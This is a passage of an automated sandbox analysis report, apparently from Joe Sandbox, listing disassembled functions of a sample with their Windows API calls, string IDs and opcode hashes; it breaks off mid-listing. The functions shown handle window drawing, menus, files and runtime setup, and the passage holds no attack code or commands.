                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 37a5c787a7b2188dc8d5479775b41731b0c96863aaa01ab20318fba061c3c2a8
                                                            • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                            • Opcode Fuzzy Hash: 37a5c787a7b2188dc8d5479775b41731b0c96863aaa01ab20318fba061c3c2a8
                                                            • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                            Function 00452AC7 Relevance: 31.8, APIs: 21, Instructions: 343COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                                            • _fseek.LIBCMT ref: 00452B3B
                                                            • __wsplitpath.LIBCMT ref: 00452B9B
                                                            • _wcscpy.LIBCMT ref: 00452BB0
                                                            • _wcscat.LIBCMT ref: 00452BC5
                                                            • __wsplitpath.LIBCMT ref: 00452BEF
                                                            • _wcscat.LIBCMT ref: 00452C07
                                                            • _wcscat.LIBCMT ref: 00452C1C
                                                            • __fread_nolock.LIBCMT ref: 00452C53
                                                            • __fread_nolock.LIBCMT ref: 00452C64
                                                            • __fread_nolock.LIBCMT ref: 00452C83
                                                            • __fread_nolock.LIBCMT ref: 00452C94
                                                            • __fread_nolock.LIBCMT ref: 00452CB5
                                                            • __fread_nolock.LIBCMT ref: 00452CC6
                                                            • __fread_nolock.LIBCMT ref: 00452CD7
                                                            • __fread_nolock.LIBCMT ref: 00452CE8
                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                              • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                              • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                            • __fread_nolock.LIBCMT ref: 00452D78
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                            • String ID:
                                                            • API String ID: 2054058615-0
                                                            • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                            • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                                            • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                            • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                                            Function 0044870C Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Window
                                                            • String ID: 0
                                                            • API String ID: 2353593579-4108050209
                                                            • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                            • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                            • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                            • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                            Function 0044A032 Relevance: 31.7, APIs: 21, Instructions: 198windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                            • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                            • GetWindowDC.USER32(?), ref: 0044A0F6
                                                            • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                            • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                            • GetSysColor.USER32(0000000F), ref: 0044A131
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                            • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                            • GetSysColor.USER32(00000005), ref: 0044A15B
                                                            • GetWindowDC.USER32(?), ref: 0044A1BE
                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                            • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                            • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                            • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                            • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                            • GetSysColor.USER32(00000008), ref: 0044A265
                                                            • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                            • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                            • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                            • String ID:
                                                            • API String ID: 1744303182-0
                                                            • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                            • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                            • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                            • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                            Function 00417C20 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                            • __mtterm.LIBCMT ref: 00417C34
                                                              • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                              • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                              • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                              • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                            • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                            • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                            • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                            • __init_pointers.LIBCMT ref: 00417CE6
                                                            • __calloc_crt.LIBCMT ref: 00417D54
                                                            • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                            • API String ID: 4163708885-3819984048
                                                            • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                            • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                            • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                            • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                            Function 004341E6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: __wcsicoll$IconLoad
                                                            • String ID: blank$info$question$stop$warning
                                                            • API String ID: 2485277191-404129466
                                                            • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                            • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                            • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                            • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                            Function 00454639 Relevance: 25.7, APIs: 17, Instructions: 199windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                            • SetWindowTextW.USER32(?,?), ref: 00454678
                                                            • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                            • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                            • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                            • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                            • GetWindowRect.USER32(?,?), ref: 004546F5
                                                            • SetWindowTextW.USER32(?,?), ref: 00454765
                                                            • GetDesktopWindow.USER32 ref: 0045476F
                                                            • GetWindowRect.USER32(00000000), ref: 00454776
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                            • GetClientRect.USER32(?,?), ref: 004547D2
                                                            • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                            • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                            • String ID:
                                                            • API String ID: 3869813825-0
                                                            • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                            • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                            • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                            • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                            Function 004649A3 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 395COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00464B28
                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                            • _wcslen.LIBCMT ref: 00464C28
                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                            • _wcslen.LIBCMT ref: 00464CBA
                                                            • _wcslen.LIBCMT ref: 00464CD0
                                                            • _wcslen.LIBCMT ref: 00464CEF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$Directory$CurrentSystem
                                                            • String ID: D
                                                            • API String ID: 1914653954-2746444292
                                                            • Opcode ID: 0d94b415f8f4be32da9437a4562fd2ea9250d6af123b13f45aceadf0defadff8
                                                            • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                            • Opcode Fuzzy Hash: 0d94b415f8f4be32da9437a4562fd2ea9250d6af123b13f45aceadf0defadff8
                                                            • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                            Function 0045CD1E Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 215COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _wcsncpy.LIBCMT ref: 0045CE39
                                                            • __wsplitpath.LIBCMT ref: 0045CE78
                                                            • _wcscat.LIBCMT ref: 0045CE8B
                                                            • _wcscat.LIBCMT ref: 0045CE9E
                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                              • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                            • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                            • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                            • _wcscpy.LIBCMT ref: 0045CF61
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                            • String ID: *.*
                                                            • API String ID: 1153243558-438819550
                                                            • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                            • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                            • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                            • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                            Function 0044B98C Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 80COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: __wcsicoll
                                                            • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                            • API String ID: 3832890014-4202584635
                                                            • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                            • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                            • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                            • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                            Function 0046A07E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 253windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                            • GetFocus.USER32 ref: 0046A0DD
                                                            • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessagePost$CtrlFocus
                                                            • String ID: 0
                                                            • API String ID: 1534620443-4108050209
                                                            • Opcode ID: 5cb98421042f455ec4000b61dd51e58b9a21b7b09c176f3470d706b88b7d88ce
                                                            • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                            • Opcode Fuzzy Hash: 5cb98421042f455ec4000b61dd51e58b9a21b7b09c176f3470d706b88b7d88ce
                                                            • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                            Function 004557E0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 220COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DestroyWindow.USER32(?), ref: 004558E3
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Window$CreateDestroy
                                                            • String ID: ,$tooltips_class32
                                                            • API String ID: 1109047481-3856767331
                                                            • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                            • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                            • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                            • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                            Function 00468B0E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 207windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                            • GetMenuItemCount.USER32(?), ref: 00468C45
                                                            • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                            • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
